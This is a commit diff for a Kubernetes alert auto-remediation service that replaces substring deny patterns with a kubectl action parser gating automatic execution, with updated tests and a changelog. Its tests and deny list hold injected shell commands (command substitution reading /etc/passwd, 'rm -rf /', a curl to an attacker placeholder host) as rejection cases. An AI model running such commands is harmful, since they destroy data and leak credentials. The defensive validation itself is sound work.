fix(auto): use action parser for repair gates
Some checks failed
CD Pipeline / tests (push) Failing after 1m2s
CD Pipeline / build-and-deploy (push) Has been skipped
CD Pipeline / post-deploy-checks (push) Has been skipped
Code Review / ai-code-review (push) Successful in 24s

This commit is contained in:
Your Name
2026-04-30 14:06:09 +08:00
parent 9ee3cc6242
commit ed2a4838f2
11 changed files with 279 additions and 60 deletions

View File

@@ -34,6 +34,7 @@ from pydantic import BaseModel, Field
from src.core.config import settings
from src.core.constants import is_cicd_alertname, is_heartbeat_alertname
from src.services.alert_rule_engine import get_incident_type, match_rule
from src.services.action_parser import is_safe_kubectl_action
from src.core.logging import get_logger
from src.core.metrics import record_alert_chain_success
@@ -1059,15 +1060,13 @@ async def receive_alert(
# 設計confidence ≥ 0.85 + 非 CRITICAL + 非破壞性 + 有 kubectl 指令 → 直接執行
# 安全防線CRITICAL / destructive patterns / NO_ACTION/INVESTIGATE/OBSERVE / 空 kubectl → 降級 PENDING
if analysis_result:
from src.services.auto_approve import _DESTRUCTIVE_PATTERNS as _cs1_destr_patterns
_cs1_kubectl = analysis_result.kubectl_command.strip() if analysis_result.kubectl_command else ""
_cs1_can_auto = (
bool(_cs1_kubectl)
and analysis_result.confidence >= 0.85
and risk_level != RiskLevel.CRITICAL
and _sa_val not in _non_destructive_actions
and not any(p in _cs1_kubectl.lower() for p in _cs1_destr_patterns)
and is_safe_kubectl_action(_cs1_kubectl)
)
if _cs1_can_auto:
try:
@@ -1396,15 +1395,13 @@ async def _process_new_alert_background(
# 設計is_rule_based=True 確定性高,滿足條件直接執行,不等人工審核
# 安全防線CRITICAL / destructive patterns / NO_ACTION / 空 kubectl → 全部降級 PENDING
try:
from src.services.auto_approve import _DESTRUCTIVE_PATTERNS
from src.models.approval import ApprovalRequest, ApprovalStatus
from src.services.approval_execution import ApprovalExecutionService
_destructive_set = set(p.lower() for p in _DESTRUCTIVE_PATTERNS)
_can_auto = (
bool(rule_kubectl)
and rule_risk != RiskLevel.CRITICAL
and not any(p in rule_kubectl.lower() for p in _destructive_set)
and is_safe_kubectl_action(rule_kubectl)
and "NO_ACTION" not in rule_action
)
if _can_auto:
@@ -1576,14 +1573,13 @@ async def _process_new_alert_background(
logger.warning("shadow_auto_approve_failed", error=str(_shadow_err_cs3))
# 2026-04-27 Claude Sonnet 4.6: CS3 LLM 高信心自動執行修法3擴展
from src.services.auto_approve import _DESTRUCTIVE_PATTERNS as _cs3_destr_patterns # noqa: PLC0415
_cs3_kubectl = (analysis_result.kubectl_command or "").strip()
_cs3_can_auto = (
bool(_cs3_kubectl)
and analysis_result.confidence >= 0.85
and risk_level != RiskLevel.CRITICAL
and "NO_ACTION" not in (analysis_result.action_title or "")
and not any(p in _cs3_kubectl.lower() for p in _cs3_destr_patterns)
and is_safe_kubectl_action(_cs3_kubectl)
)
if _cs3_can_auto:
try:

View File

@@ -57,6 +57,8 @@ class ActionKind(StrEnum):
READONLY = "readonly"
ROLLOUT = "rollout"
SCALE = "scale"
AUTOSCALE = "autoscale"
SET_RESOURCES = "set_resources"
DELETE_POD = "delete_pod"
@@ -81,13 +83,29 @@ def is_safe_kubectl_action(command: str) -> bool:
return parse_kubectl_action(command).ok
def kubectl_safety_reason(command: str) -> str | None:
"""Return None for a safe kubectl command, otherwise the parser reason.
Non-kubectl commands are outside this parser's scope and return None so
SSH / host-repair gates can keep their own policy.
"""
command = (command or "").strip()
if not command.lower().startswith("kubectl"):
return None
parsed = parse_kubectl_action(command)
return None if parsed.ok else parsed.reason
def parse_kubectl_action(command: str) -> ParsedKubectlAction:
"""Parse and validate a kubectl command for auto-execute safety.
The grammar is intentionally narrow:
- readonly: get/describe/logs/top/version with bounded, known-safe flags
- rollout: rollout restart/undo on workload resources
- rollout: rollout restart on workload resources
- scale: scale deployment/statefulset to a positive replica count
- autoscale: HPA bounds on deployment/statefulset with positive min/max
- set resources: CPU/memory requests/limits on deployment/statefulset
- delete: delete one pod by name only
"""
@@ -124,6 +142,10 @@ def parse_kubectl_action(command: str) -> ParsedKubectlAction:
return _parse_rollout(rest, namespace, namespace_flags)
if verb == "scale":
return _parse_scale(rest, namespace, namespace_flags)
if verb == "autoscale":
return _parse_autoscale(rest, namespace, namespace_flags)
if verb == "set":
return _parse_set(rest, namespace, namespace_flags)
if verb == "delete":
return _parse_delete(rest, namespace, namespace_flags)
return _reject("unsupported_verb")
@@ -241,7 +263,7 @@ def _parse_rollout(
if len(tokens) < 2:
return _reject("rollout_missing_args")
subverb = tokens[0]
if subverb not in {"restart", "undo"}:
if subverb != "restart":
return _reject("unsupported_rollout_subverb")
resource_type, resource_name, rest = _split_resource_ref(tokens[1:])
@@ -308,6 +330,104 @@ def _parse_scale(
)
def _parse_autoscale(
tokens: list[str],
namespace: str | None,
namespace_flags: list[str],
) -> ParsedKubectlAction:
resource_type, resource_name, rest = _split_resource_ref(tokens)
if resource_type not in _SCALABLE_RESOURCES or not resource_name:
return _reject("invalid_autoscale_resource")
min_replicas: int | None = None
max_replicas: int | None = None
cpu_percent: int | None = None
remaining_flags: list[str] = []
i = 0
while i < len(rest):
token = rest[i]
flag, raw_value, consumed = _consume_required_flag_value(
rest,
i,
{"--min", "--max", "--cpu-percent"},
)
if not flag or raw_value is None:
return _reject("unsupported_autoscale_flag")
value = _parse_positive_int(raw_value)
if value < 1:
return _reject("autoscale_value_must_be_positive")
if flag == "--min":
min_replicas = value
elif flag == "--max":
max_replicas = value
elif flag == "--cpu-percent":
cpu_percent = value
remaining_flags.extend(rest[i:i + consumed])
i += consumed
if min_replicas is None or max_replicas is None:
return _reject("autoscale_min_max_required")
if max_replicas < min_replicas:
return _reject("autoscale_max_below_min")
if cpu_percent is not None and cpu_percent > 100:
return _reject("autoscale_cpu_percent_out_of_range")
return ParsedKubectlAction(
ok=True,
reason="ok",
kind=ActionKind.AUTOSCALE,
verb="autoscale",
resource_type=resource_type,
resource_name=resource_name,
namespace=namespace,
flags=tuple(namespace_flags + remaining_flags),
)
def _parse_set(
tokens: list[str],
namespace: str | None,
namespace_flags: list[str],
) -> ParsedKubectlAction:
if not tokens or tokens[0] != "resources":
return _reject("unsupported_set_subverb")
resource_type, resource_name, rest = _split_resource_ref(tokens[1:])
if resource_type not in _SCALABLE_RESOURCES or not resource_name:
return _reject("invalid_set_resources_target")
saw_resource_flag = False
remaining_flags: list[str] = []
i = 0
while i < len(rest):
flag, raw_value, consumed = _consume_required_flag_value(
rest,
i,
{"--limits", "--requests"},
)
if not flag or raw_value is None:
return _reject("unsupported_set_resources_flag")
if not _resource_quantity_assignments_safe(raw_value):
return _reject("invalid_resource_quantity")
saw_resource_flag = True
remaining_flags.extend(rest[i:i + consumed])
i += consumed
if not saw_resource_flag:
return _reject("set_resources_requires_limits_or_requests")
return ParsedKubectlAction(
ok=True,
reason="ok",
kind=ActionKind.SET_RESOURCES,
verb="set",
subverb="resources",
resource_type=resource_type,
resource_name=resource_name,
namespace=namespace,
flags=tuple(namespace_flags + remaining_flags),
)
def _parse_delete(
tokens: list[str],
namespace: str | None,
@@ -339,6 +459,43 @@ def _parse_positive_int(value: str) -> int:
return int(value)
def _consume_required_flag_value(
tokens: list[str],
index: int,
allowed_flags: set[str],
) -> tuple[str | None, str | None, int]:
token = tokens[index]
if "=" in token:
flag, value = token.split("=", 1)
if flag not in allowed_flags or not value:
return None, None, 1
return flag, value, 1
if token not in allowed_flags or index + 1 >= len(tokens):
return None, None, 1
value = tokens[index + 1]
if not value or value.startswith("-"):
return None, None, 1
return token, value, 2
def _resource_quantity_assignments_safe(value: str) -> bool:
parts = value.split(",")
if not parts:
return False
for part in parts:
key, separator, quantity = part.partition("=")
if separator != "=":
return False
if key not in {"cpu", "memory"}:
return False
if not quantity or not set(quantity) <= _SAFE_TOKEN_CHARS:
return False
if quantity in {"0", "0m", "0Mi", "0Gi"}:
return False
return True
def _flags_allowed(tokens: list[str], allowed_flags: set[str]) -> bool:
i = 0
while i < len(tokens):

View File

@@ -32,6 +32,7 @@ import structlog
import yaml
from src.constants.alert_types import ALERTNAME_TO_TYPE
from src.services.action_parser import parse_kubectl_action
logger = structlog.get_logger(__name__)
@@ -43,19 +44,17 @@ _generating: set[str] = set()
# Redis 分散式鎖 TTL (秒),覆蓋 Ollama + Gemini 最長生成時間
_RULE_GEN_LOCK_TTL = 120
# ── kubectl 注入防護 (Task 2.3, ADR-076, 2026-04-14) ─────────
# 對齊 auto_approve._DESTRUCTIVE_PATTERNS + decision_manager._ALLOWED_KUBECTL_PATTERN
# 目標: 規則 YAML 中的 kubectl_command 在變數替換後若含下列破壞性模式 → 清空並告警
_RULE_ENGINE_DESTRUCTIVE_RE = re.compile(
r"(kubectl\s+delete\s+(pvc|namespace|statefulset|deployment)" # 破壞性 K8s 刪除
r"|kubectl\s+(drain|cordon)" # 節點驅逐/封鎖
r"|--replicas=\s*0\b" # 縮容至零
r"|rm\s+-[rf]{1,2}\s" # rm -rf
r"|\bdrop\s+(table|database)\b" # SQL 破壞性 DDL
r"|\$\([^)]{0,200}\)" # shell 命令替換 $(...)
r"|`[^`]{0,200}`" # 反引號替換
r")",
re.IGNORECASE,
# ── action parser 注入防護 (SPF-2, 2026-04-30) ───────────────
# kubectl 走 structured token parser非 kubectl 保留簡單 dangerous-fragment
# 掃描,避免舊式巨型 regex 誤殺安全的單一 delete pod / deployment resource forms。
_RULE_ENGINE_DANGEROUS_FRAGMENTS = (
"rm -rf",
"rm -f /",
"drop table",
"drop database",
"truncate table",
"$(",
"`",
)
# ── kubectl 注入防護 公開 API ───────────────────────────────
@@ -63,7 +62,7 @@ _RULE_ENGINE_DESTRUCTIVE_RE = re.compile(
def validate_kubectl_command(command: str) -> bool:
"""
kubectl 注入安全驗證Task 2.3, ADR-076
Action 注入安全驗證Task 2.3, ADR-076; SPF-2 parser upgrade)。
Returns:
True — 指令安全,可執行
@@ -74,18 +73,19 @@ def validate_kubectl_command(command: str) -> bool:
- "ssh ..." 開頭 — SSH 層指令,不走 kubectl 路徑
阻擋條件(返回 False:
- kubectl delete pvc/namespace/statefulset/deployment — 破壞性刪除
- kubectl drain / cordon — 節點驅逐(業務衝擊
- --replicas=0 — 縮容至零(服務停止)
- rm -rf — 主機層破壞
- DROP TABLE/DATABASE — SQL 破壞性 DDL
- $(...) 或反引號 — Shell 命令注入
- kubectl parser 不支援的語法deployment delete / drain / cordon /
replicas=0 / shell metachar / compound command
- 非 kubectl 指令內含主機/SQL/command-substitution 危險片段
"""
command = (command or "").strip()
if not command:
return True
if command.strip().startswith("ssh "):
if command.startswith("ssh "):
return True
return not bool(_RULE_ENGINE_DESTRUCTIVE_RE.search(command))
if command.startswith("kubectl"):
return parse_kubectl_action(command).ok
command_lower = command.lower()
return not any(fragment in command_lower for fragment in _RULE_ENGINE_DANGEROUS_FRAGMENTS)
# ── 變數提取 ────────────────────────────────────────────────

View File

@@ -26,6 +26,7 @@ from typing import Any
import structlog
from src.models.playbook import Playbook
from src.services.action_parser import parse_kubectl_action
from src.services.playbook_rag import PlaybookMatch
from src.services.trust_engine import TrustScoreManager, get_trust_manager
@@ -105,7 +106,9 @@ _DESTRUCTIVE_PATTERNS: list[str] = [
"replicas=0", # 任何形式的 replicas=0
# --- K8s 刪除操作 ---
"delete pod", # 強制刪除 pod (kubectl delete pod / pods)
"delete pod --all", # 批次刪除 pod
"delete pod -A", # 跨 namespace 刪除 pod
"delete pod --all-namespaces",
"delete pods", # 複數形式
"delete deployment", # 刪除 deployment
"delete pvc", # 刪除 PVC (資料丟失)
@@ -263,20 +266,36 @@ class AutoApprovePolicy:
confidence=confidence,
)
# 條件 1b: 破壞性指令攔截 (ADR-070: 2026-04-11 Claude Sonnet 4.6)
# 即使是 low/medium risk以下操作仍需人工確認
# 原則: 可恢復操作 → 自動執行; 不可逆 / 業務衝擊 → 人工
# M1+C3 修復 2026-04-11 (Code Review): 移至模組常量 + 補全 K8s/Docker 高風險操作
action_lower = action.lower()
for pattern in _DESTRUCTIVE_PATTERNS:
if pattern in action_lower:
# 條件 1b: structured action parser 安全閘 (SPF-2, 2026-04-30)
# kubectl 指令以 token grammar 判斷,避免 substring regex 誤殺
# `kubectl delete pod <one-pod>`,同時攔截 delete deployment /
# delete --all / rollout undo / replicas=0 / shell injection。
action_stripped = action.strip()
action_lower = action_stripped.lower()
kubectl_cmd_raw = str(proposal_data.get("kubectl_command", "") or "").strip()
kubectl_candidate = kubectl_cmd_raw
if not kubectl_candidate and "kubectl" in action_lower:
kubectl_candidate = action_stripped[action_lower.index("kubectl"):].strip()
if kubectl_candidate.lower().startswith("kubectl"):
parsed_action = parse_kubectl_action(kubectl_candidate)
if not parsed_action.ok:
return self._reject(
reason=AutoApproveReason.CRITICAL_OPERATION,
detail=f"Destructive pattern detected: '{pattern}' in action — requires human approval",
detail=f"kubectl action parser rejected action: {parsed_action.reason} — requires human approval",
risk_level=risk_level,
trust_score=trust_score,
confidence=confidence,
)
else:
for pattern in _DESTRUCTIVE_PATTERNS:
if pattern in action_lower:
return self._reject(
reason=AutoApproveReason.CRITICAL_OPERATION,
detail=f"Destructive pattern detected: '{pattern}' in action — requires human approval",
risk_level=risk_level,
trust_score=trust_score,
confidence=confidence,
)
# 條件 1c: 無可執行指令 → 拒絕自動執行2026-04-16 ogt + Claude Sonnet 4.6
# 根因INVALID_TARGET 導致 rule engine 清空 kubectl_commandaction 為空

View File

@@ -18,6 +18,8 @@ from src.services.action_parser import (
"kubectl rollout restart deployment awoooi-api -n awoooi-prod",
"kubectl -n awoooi-prod rollout restart deploy/awoooi-api",
"kubectl scale deployment awoooi-api --replicas=3 -n awoooi-prod",
"kubectl autoscale deployment awoooi-api --cpu-percent=70 --min=2 --max=5 -n awoooi-prod",
"kubectl set resources deployment/awoooi-api --limits=cpu=2000m,memory=1Gi -n awoooi-prod",
"kubectl delete pod awoooi-api-7d6b776f78-4sgjl -n awoooi-prod",
"kubectl get pods -n awoooi-prod",
"kubectl describe node k3s-node-01",
@@ -33,10 +35,14 @@ def test_safe_kubectl_actions_pass(cmd):
"kubectl get pods -n prod $(echo injected)",
"kubectl rollout restart deployment/$(cat /etc/passwd)",
"kubectl rollout restart deployment/awoooi-api; rm -rf / -n prod",
"kubectl rollout undo deployment/awoooi-api -n prod",
"kubectl get pods -n prod && curl http://attacker.invalid",
"kubectl delete deployment awoooi-api -n awoooi-prod",
"kubectl delete pods --all -n awoooi-prod",
"kubectl delete pod awoooi-api-7d6b776f78-4sgjl --force -n awoooi-prod",
"kubectl scale deployment awoooi-api --replicas=0 -n awoooi-prod",
"kubectl autoscale deployment awoooi-api --min=5 --max=2 -n awoooi-prod",
"kubectl set resources deployment/awoooi-api --limits=ephemeral-storage=10Gi -n awoooi-prod",
"kubectl patch deployment awoooi-api -p spec -n awoooi-prod",
"ssh 192.168.0.188 docker restart openclaw",
])

View File

@@ -62,18 +62,18 @@ class TestValidKubectlCommands:
"""常見合法 kubectl 指令應通過"""
assert validate_kubectl_command(cmd) is True
def test_kubectl_exec_with_psql(self):
"""kubectl exec 查詢(含 SQL SELECT→ 通過"""
def test_kubectl_exec_with_psql_is_not_auto_executable(self):
"""kubectl exec 可執行任意 shell必須降級人工"""
cmd = (
"kubectl exec -n awoooi-prod deployment/postgresql -- "
"psql -U postgres -c 'SELECT pg_terminate_backend(pid) FROM pg_stat_activity;'"
)
assert validate_kubectl_command(cmd) is True
assert validate_kubectl_command(cmd) is False
def test_kubectl_get_with_jq(self):
"""kubectl get + pipe → 通過"""
def test_compound_kubectl_get_is_not_auto_executable(self):
"""compound shell 指令必須降級人工"""
cmd = "kubectl get pods -n monitoring && curl -s http://192.168.0.120:9093/api/v1/status"
assert validate_kubectl_command(cmd) is True
assert validate_kubectl_command(cmd) is False
# =============================================================================

View File

@@ -64,7 +64,7 @@ def _run_cs1_block(
回傳 (mock_executor_class, mock_execute_method)
"""
from src.services.auto_approve import _DESTRUCTIVE_PATTERNS
from src.services.action_parser import is_safe_kubectl_action
mock_exec_instance = MagicMock()
if exec_side_effect is not None:
@@ -94,7 +94,7 @@ def _run_cs1_block(
and analysis_result.confidence >= 0.85
and risk_level != RiskLevel.CRITICAL
and _sa_val not in _non_destructive_actions
and not any(p in _cs1_kubectl.lower() for p in _DESTRUCTIVE_PATTERNS)
and is_safe_kubectl_action(_cs1_kubectl)
)
if _cs1_can_auto:
import asyncio
@@ -155,6 +155,15 @@ class TestCS1AutoExecuteConditions:
_, mock_exec = _run_cs1_block(analysis, RiskLevel.LOW)
mock_exec.execute_approved_action.assert_not_called()
def test_single_delete_pod_executes(self):
"""單一 Pod delete 是可恢復操作parser 不應誤殺"""
analysis = _make_analysis(
confidence=0.90,
kubectl_command="kubectl delete pod api-xxx-yyy -n prod",
)
_, mock_exec = _run_cs1_block(analysis, RiskLevel.LOW)
mock_exec.execute_approved_action.assert_called_once()
def test_no_action_does_not_execute(self):
"""suggested_action=NO_ACTION → 不執行"""
analysis = _make_analysis(
@@ -182,7 +191,7 @@ class TestCS1AutoExecuteFailureDegradation:
analysis = _make_analysis(confidence=0.90)
# 直接測試條件邏輯,確保例外被吞掉
from src.services.auto_approve import _DESTRUCTIVE_PATTERNS
from src.services.action_parser import is_safe_kubectl_action
_non_destructive_actions = {"NO_ACTION", "INVESTIGATE", "OBSERVE"}
_sa_val = analysis.suggested_action.value
@@ -192,7 +201,7 @@ class TestCS1AutoExecuteFailureDegradation:
and analysis.confidence >= 0.85
and RiskLevel.LOW != RiskLevel.CRITICAL
and _sa_val not in _non_destructive_actions
and not any(p in _cs1_kubectl.lower() for p in _DESTRUCTIVE_PATTERNS)
and is_safe_kubectl_action(_cs1_kubectl)
)
assert _cs1_can_auto, "前置條件必須為 True 才能測試降級"

View File

@@ -35,13 +35,14 @@ def _make_analysis(
def _can_auto(analysis, risk_level, patterns):
from src.models.approval import RiskLevel
from src.services.action_parser import is_safe_kubectl_action
kubectl = (analysis.kubectl_command or "").strip()
return (
bool(kubectl)
and analysis.confidence >= 0.85
and risk_level != RiskLevel.CRITICAL
and "NO_ACTION" not in (analysis.action_title or "")
and not any(p in kubectl.lower() for p in patterns)
and is_safe_kubectl_action(kubectl)
)
@@ -78,9 +79,14 @@ class TestCS3AutoExecute:
a = _make_analysis(action_title="NO_ACTION: no fix needed")
assert _can_auto(a, RiskLevel.MEDIUM, patterns) is False
def test_destructive_delete_blocked(self, patterns):
def test_single_delete_pod_eligible(self, patterns):
from src.models.approval import RiskLevel
a = _make_analysis(kubectl="kubectl delete pod foo-123")
assert _can_auto(a, RiskLevel.MEDIUM, patterns) is True
def test_delete_pods_all_blocked(self, patterns):
from src.models.approval import RiskLevel
a = _make_analysis(kubectl="kubectl delete pods --all -n prod")
assert _can_auto(a, RiskLevel.MEDIUM, patterns) is False
def test_destructive_force_check(self, patterns):

View File

@@ -53,16 +53,22 @@ class TestDestructivePatternsBlocked:
def test_scale_to_zero_blocked(self, policy):
d = policy.evaluate(self._proposal("kubectl scale deployment api --replicas=0"))
assert not d.should_auto_approve
assert "Destructive pattern" in d.reason_detail
assert "parser rejected" in d.reason_detail
def test_delete_deployment_blocked(self, policy):
d = policy.evaluate(self._proposal("kubectl delete deployment api-server"))
assert not d.should_auto_approve
assert "Destructive pattern" in d.reason_detail
assert "parser rejected" in d.reason_detail
def test_delete_pod_blocked(self, policy):
def test_delete_pod_allowed_by_parser(self, policy):
d = policy.evaluate(self._proposal("kubectl delete pod api-server-abc123"))
assert d.should_auto_approve
assert "Destructive pattern" not in d.reason_detail
def test_delete_pod_force_blocked(self, policy):
d = policy.evaluate(self._proposal("kubectl delete pod api-server-abc123 --force"))
assert not d.should_auto_approve
assert "parser rejected" in d.reason_detail
def test_delete_pods_plural_blocked(self, policy):
d = policy.evaluate(self._proposal("kubectl delete pods --all -n awoooi-prod"))

View File

@@ -19,6 +19,7 @@ CS2 規則引擎自動執行條件邏輯測試
"""
from src.models.approval import RiskLevel
from src.services.action_parser import is_safe_kubectl_action
from src.services.auto_approve import _DESTRUCTIVE_PATTERNS
@@ -31,11 +32,10 @@ def _evaluate_can_auto(
複製 webhooks.py CS2 路徑的 _can_auto 邏輯,用於單元測試。
任何修改 webhooks.py 邏輯的人,必須同步更新此函數。
"""
_destructive_set = set(p.lower() for p in _DESTRUCTIVE_PATTERNS)
return (
bool(rule_kubectl)
and rule_risk != RiskLevel.CRITICAL
and not any(p in rule_kubectl.lower() for p in _destructive_set)
and is_safe_kubectl_action(rule_kubectl)
and "NO_ACTION" not in rule_action
)
@@ -90,12 +90,12 @@ class TestCS2CanAutoConditions:
# ── 防線 3DESTRUCTIVE_PATTERNS ────────────────────────────────────
def test_delete_pod_returns_false(self):
def test_single_delete_pod_returns_true(self):
assert _evaluate_can_auto(
rule_kubectl="kubectl delete pod api-xxx-yyy -n prod",
rule_risk=RiskLevel.LOW,
rule_action="刪除 Pod | kubectl delete pod api-xxx-yyy -n prod",
) is False
) is True
def test_delete_pods_returns_false(self):
assert _evaluate_can_auto(
@@ -104,6 +104,13 @@ class TestCS2CanAutoConditions:
rule_action="刪除所有 Pod | kubectl delete pods --all -n prod",
) is False
def test_delete_pod_force_returns_false(self):
assert _evaluate_can_auto(
rule_kubectl="kubectl delete pod api-xxx-yyy --force -n prod",
rule_risk=RiskLevel.LOW,
rule_action="強制刪除 Pod | kubectl delete pod api-xxx-yyy --force -n prod",
) is False
def test_scale_to_zero_returns_false(self):
assert _evaluate_can_auto(
rule_kubectl="kubectl scale deployment/api --replicas=0 -n prod",

View File

@@ -6,6 +6,19 @@
---
## 2026-04-30 | SPF-2 action parser 收斂 — 告警自動修復安全閘
承接 Wave A「告警→自動修復」阻塞點將 CS1/CS2/CS3 自動執行路徑從 substring destructive patterns 收斂到 structured kubectl action parser。
### 完成
- `action_parser.py` 擴充安全語法rollout restart、scale 正整數、autoscale 正 min/max、set resources CPU/memory、單一 Pod delete、read-only get/describe/logs/top/version。
- `webhooks.py` CS1 / CS2 / CS3 全部改用 `is_safe_kubectl_action()`,避免 `_DESTRUCTIVE_PATTERNS` 誤殺 `kubectl delete pod <one-pod>`
- `auto_approve.py` kubectl action 先走 parser非 kubectl / SSH 再走 legacy dangerous fragments`delete pod --all``delete deployment``rollout undo``replicas=0`、shell injection 仍阻擋。
- `alert_rule_engine.validate_kubectl_command()` 由巨型 regex 改為 parser-backed gatecompound shell / `kubectl exec` 自動降級人工。
### 驗證
- `PYTHONPATH=apps/api python3 -m pytest apps/api/tests/test_action_parser_safety.py apps/api/tests/test_alert_rule_engine_validation.py apps/api/tests/test_rule_engine_auto_execute.py apps/api/tests/test_cs3_auto_execute.py apps/api/tests/test_cs1_auto_execute.py apps/api/tests/test_destructive_patterns.py -q` → 123 passed。
## 2026-04-30 | CD Runner 拆段 — host build/deploy
承接 `RWLayer ... unexpectedly nil` 持續打斷 Gitea CD 的問題。第一層 `capacity: 1` + Docker lock 可阻止跨 repo 並行,但長時間 Web build 仍會讓 transient act job container 在 build 收尾消失。